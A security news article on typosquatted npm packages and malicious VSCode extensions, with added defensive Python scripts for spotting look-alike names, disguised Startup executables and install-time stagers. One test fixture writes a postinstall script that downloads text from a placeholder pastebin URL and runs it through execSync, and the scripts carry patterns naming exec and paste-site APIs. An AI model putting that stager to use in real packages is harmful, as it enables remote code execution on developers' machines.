Threat actors have been observed publishing counterfeit npm packages that mimic legitimate ones such as typescript-eslint and @types/node, racking up thousands of downloads from unsuspecting users of the registry.
The impostor packages, named @typescript_eslinter/eslint and types-node, are designed to drop a trojan and to fetch second-stage payloads, respectively.
“Although typosquatting attacks are far from novel, the diligence exhibited by these malicious operators in fabricating these libraries as credible is indeed striking,” remarked Ax Sharma from Sonatype in a detailed analysis published on Wednesday.
“Moreover, the inflated download figures for packages like types-node suggest a combination of genuine developers inadvertently downloading these typosquats and attackers artificially boosting download statistics to enhance the perceived legitimacy of their malicious offerings.”
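The two name confusions described above, a look-alike scope (@typescript_eslinter for @typescript-eslint) and a scope flattened into an unscoped name (types-node for @types/node), can be caught before npm install ever runs by comparing a project's declared dependencies against an allow-list. The Python script below is an added example written for this article, not Sonatype's tooling; the allow-list, the edit-distance threshold of 2 and the sample package.json are constructed assumptions.

```python
import json
import re

# Constructed allow-list: the packages this project legitimately depends on (a demo assumption).
KNOWN_GOOD = [
    "@typescript-eslint/eslint-plugin",
    "@typescript-eslint/parser",
    "@types/node",
    "eslint",
    "prettier",
    "typescript",
]
MAX_DISTANCE = 2  # assumption: up to two edits still counts as a look-alike


def normalize(name):
    """Lower-case, drop the leading '@' and treat '/', '-', '_' and '.' as one separator."""
    return re.sub(r"[/_.\-]+", " ", name.lower().lstrip("@")).strip()


def split_scope(name):
    """'@scope/pkg' -> ('scope', 'pkg'); an unscoped name -> (None, name)."""
    if name.startswith("@") and "/" in name:
        scope, _, base = name[1:].partition("/")
        return scope.lower(), base.lower()
    return None, name.lower()


def edit_distance(a, b):
    """Damerau-Levenshtein (optimal string alignment): insert, delete, substitute, swap adjacent."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            d = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                d = min(d, prev2[j - 2] + 1)  # adjacent transposition
            cur.append(d)
        prev2, prev = prev, cur
    return prev[-1]


def suspicious(candidate, known=KNOWN_GOOD):
    """Return a reason if `candidate` looks like an imitation of an allow-listed package, else None."""
    if candidate in known:
        return None  # exact allow-list hit
    known_scopes = {s for s, _ in map(split_scope, known) if s}
    scope, _ = split_scope(candidate)
    # 1. Scope impersonation: '@typescript_eslinter' is two edits from '@typescript-eslint'.
    if scope and scope not in known_scopes:
        for good in sorted(known_scopes):
            if edit_distance(normalize(scope), normalize(good)) <= MAX_DISTANCE:
                return f"scope '@{scope}' imitates '@{good}'"
    # 2. Whole-name confusion, which also catches a dropped scope: 'types-node' vs '@types/node'.
    for good in known:
        if edit_distance(normalize(candidate), normalize(good)) <= MAX_DISTANCE:
            return f"name imitates '{good}' (scope dropped or letters changed)"
    return None


def audit_dependencies(package_json_text):
    """Map every flagged dependency name in a package.json to the reason it was flagged."""
    manifest = json.loads(package_json_text)
    findings = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name in manifest.get(section, {}):
            reason = suspicious(name)
            if reason:
                findings[name] = reason
    return findings


# Constructed sample manifest mixing the two impostors with legitimate packages.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-app",
  "devDependencies": {
    "@typescript_eslinter/eslint": "^1.0.0",
    "types-node": "^22.0.0",
    "@types/node": "^22.0.0",
    "eslint": "^9.0.0",
    "lodash": "^4.17.21"
  }
}"""

if __name__ == "__main__":
    for name, reason in audit_dependencies(SAMPLE_PACKAGE_JSON).items():
        print(f"{name}: {reason}")
```

A threshold of two edits is aggressive for short unscoped names and will produce false positives (for example, a legitimate package whose name happens to be close to an allow-listed one); treat a hit as a prompt to inspect the registry page and publisher, not as a verdict.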
A Deceptive Facade
Sonatype’s investigation of the npm listing for @typescript_eslinter/eslint uncovered a bogus GitHub repository linked to a user named “typescript-eslinter,” created on November 29, 2024. Shipped with the package is a file named prettier.bat.
A companion package, @typescript_eslinter/prettier, masquerades as the well-known Prettier code formatter. Instead of providing that functionality, it installs the malicious @typescript_eslinter/eslint package.
That package is programmed to write prettier.bat to a temporary folder and add it to the Windows Startup directory, so that it runs automatically at every logon, and therefore after every reboot.
“Contrary to its .bat extension, the prettier.bat file is actually a Windows executable (.exe) that has been previously flagged on VirusTotal as a trojan and dropper,” Sharma elaborated.
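A defender can check the Startup folder for exactly this kind of disguise: a file whose extension says script but whose first two bytes are the MZ header that every Windows PE executable carries. The Python script below is an added example, not part of the Sonatype analysis; the Startup paths are the standard per-user and all-users locations, the heuristic that a native binary sitting directly in Startup (rather than a .lnk shortcut) deserves review is the author's own assumption, and the sample folder is constructed in a temporary directory.

```python
import os
import tempfile
from pathlib import Path

PE_MAGIC = b"MZ"  # DOS-stub signature at the start of every Windows PE executable
SCRIPT_EXTENSIONS = {".bat", ".cmd", ".ps1", ".vbs", ".js"}
NATIVE_EXTENSIONS = {".exe", ".dll", ".scr", ".com"}


def startup_folders():
    """Standard Windows Startup folders (per-user and all-users); empty on a non-Windows host."""
    locations = (
        ("APPDATA", r"Microsoft\Windows\Start Menu\Programs\Startup"),
        ("ProgramData", r"Microsoft\Windows\Start Menu\Programs\StartUp"),
    )
    return [Path(os.environ[var]) / tail for var, tail in locations if var in os.environ]


def is_pe_executable(path):
    """True if the file begins with the 'MZ' header, whatever its extension claims."""
    with open(path, "rb") as fh:
        return fh.read(len(PE_MAGIC)) == PE_MAGIC


def scan_startup(directory):
    """Return (filename, reason) pairs for Startup entries that deserve a closer look."""
    findings = []
    for entry in sorted(Path(directory).iterdir()):
        if not entry.is_file():
            continue
        ext = entry.suffix.lower()
        if ext in SCRIPT_EXTENSIONS and is_pe_executable(entry):
            findings.append((entry.name, f"'{ext}' file carries a PE header: executable disguised as a script"))
        elif ext in NATIVE_EXTENSIONS or is_pe_executable(entry):
            # Heuristic (author's assumption): legitimate autostarts are usually .lnk shortcuts,
            # so a native binary placed directly in Startup is unusual enough to review.
            findings.append((entry.name, "native executable placed directly in Startup"))
    return findings


def build_sample_startup():
    """Constructed fixture in a temp dir: one disguised PE, one genuine batch file, one shortcut-like file."""
    folder = Path(tempfile.mkdtemp(prefix="startup-demo-"))
    # PE-style header bytes only, not a real program; stands in for the renamed executable.
    (folder / "prettier.bat").write_bytes(PE_MAGIC + b"\x90\x00\x03\x00" + b"\x00" * 60)
    (folder / "sync.bat").write_text("@echo off\r\necho syncing\r\n")
    (folder / "Tool.lnk").write_bytes(b"L\x00\x00\x00")
    return folder


if __name__ == "__main__":
    targets = [d for d in startup_folders() if d.is_dir()] or [build_sample_startup()]
    for target in targets:
        for name, reason in scan_startup(target):
            print(f"{target / name}: {reason}")
```

Run on a Windows host it scans the real Startup folders; elsewhere it falls back to the constructed sample so the logic can still be exercised. The same magic-byte comparison extends naturally to other autostart locations such as Run keys once the referenced paths are resolved.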
The Multifaceted Threat
The second package, types-node, is configured to reach out to a Pastebin URL to fetch scripts that deploy a malicious executable deceptively named npm.exe.
“This scenario underscores the critical need for fortified supply chain security protocols and heightened scrutiny of third-party software registries,” Sharma emphasized.
Broader Implications in Supply Chain Security
This development coincides with ReversingLabs’ discovery of numerous malicious extensions on the Visual Studio Code (VSCode) Marketplace in October 2024. A month later, a further malicious npm package surfaced, attracting 399 downloads before it was identified and removed.
Malicious VSCode Extensions Identified
The rogue extensions, which have since been purged, include:
- EVM.Blockchain-Toolkit
- VoiceMod.VoiceMod
- ZoomVideoCommunications.Zoom
- ZoomINC.Zoom-Workplace
- Ethereum.SoliditySupport
- ZoomWorkspace.Zoom
- ethereumorg.Solidity-Language-for-Ethereum
- VitalikButerin.Solidity-Ethereum
- SolidityFoundation.Solidity-Ethereum
- EthereumFoundation.Solidity-Language-for-Ethereum
- SOLIDITY.Solidity-Language
- GavinWood.SolidityLang
- EthereumFoundation.Solidity-for-Ethereum-Language
“The campaign initially targeted the cryptocurrency sector, but by late October, the fraudulent extensions began impersonating Zoom applications,” stated Lucija Valentić, a researcher at ReversingLabs. “Each successive extension demonstrated increasing sophistication.”
Hidden Payloads and Developer Caution
These malicious tools incorporated obfuscated JavaScript code, serving as downloaders for second-stage payloads from remote servers. While the exact nature of these payloads remains undetermined, the findings amplify the call for heightened vigilance when sourcing open-source libraries and extensions.
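Both the types-node package (a script pulled from a Pastebin URL that deploys an executable) and the VSCode extensions (obfuscated JavaScript that downloads a second stage) share one shape: code that runs at install or load time, fetches content from a remote host and executes what it receives. The script below performs an offline triage of an unpacked package for that shape. It is an added example for this article, not tooling from Sonatype or ReversingLabs; the paste-site list and the API patterns are the author's assumptions, npm's install-time lifecycle scripts (preinstall, install, postinstall, prepare) are a general npm fact rather than something either report attributes to these packages, and the sample package, including its pastebin.com/raw/EXAMPLE00 URL, is constructed in a temporary directory.

```python
import json
import re
import tempfile
from pathlib import Path

# npm runs these package.json scripts automatically during `npm install` (general npm behaviour).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicator patterns (author's assumption: typical of download-and-run stagers).
PASTE_URL = re.compile(r"""https?://(?:www\.)?(?:pastebin\.com|paste\.ee|hastebin\.com)/[^\s"'`)]+""", re.I)
NETWORK_API = re.compile(r"\b(?:https?\.(?:get|request)|fetch|XMLHttpRequest|axios)\b")
EXEC_API = re.compile(r"\b(?:child_process|execSync|spawnSync|exec|spawn|eval|new Function)\b")
SOURCE_SUFFIXES = {".js", ".cjs", ".mjs", ".json"}


def audit_package(root):
    """Static triage of an unpacked npm package directory; makes no network requests."""
    root = Path(root)
    findings = {"install_hooks": {}, "paste_urls": [], "fetch_and_exec": []}
    manifest = root / "package.json"
    if manifest.is_file():
        scripts = json.loads(manifest.read_text(encoding="utf-8")).get("scripts", {})
        findings["install_hooks"] = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SOURCE_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        rel = str(path.relative_to(root))
        for match in PASTE_URL.finditer(text):
            findings["paste_urls"].append((rel, match.group(0)))
        # A file that both talks to the network and can run code is the download-then-execute shape.
        if NETWORK_API.search(text) and EXEC_API.search(text):
            findings["fetch_and_exec"].append(rel)
    return findings


def build_sample_package():
    """Constructed fixture only: an unpacked package whose postinstall hook runs a stager-like script."""
    root = Path(tempfile.mkdtemp(prefix="pkg-demo-"))
    (root / "package.json").write_text(json.dumps({
        "name": "example-pkg",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js", "test": "echo ok"},
    }), encoding="utf-8")
    (root / "setup.js").write_text(
        'const https = require("https");\n'
        'const { execSync } = require("child_process");\n'
        '// Constructed stand-in: pull text from a paste site and hand it to a shell.\n'
        'https.get("https://pastebin.com/raw/EXAMPLE00", (res) => {\n'
        '  let body = ""; res.on("data", (c) => (body += c)); res.on("end", () => execSync(body));\n'
        '});\n',
        encoding="utf-8",
    )
    (root / "index.js").write_text('module.exports = () => "types helper";\n', encoding="utf-8")
    return root


if __name__ == "__main__":
    print(json.dumps(audit_package(build_sample_package()), indent=2))
```

Point it at a tarball obtained with npm pack and extracted, which downloads the package without running its scripts. Obfuscated code of the kind ReversingLabs describes will usually defeat the API patterns, so a populated install_hooks entry is worth reading on its own even when the other two lists come back empty.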
“The capability to integrate plugins and enhance IDE functionality renders these platforms enticing targets for adversaries,” Valentić warned. “Despite their critical role, IDE extensions are frequently underestimated as a security threat, yet their compromise could jeopardize an organization’s entire development lifecycle.”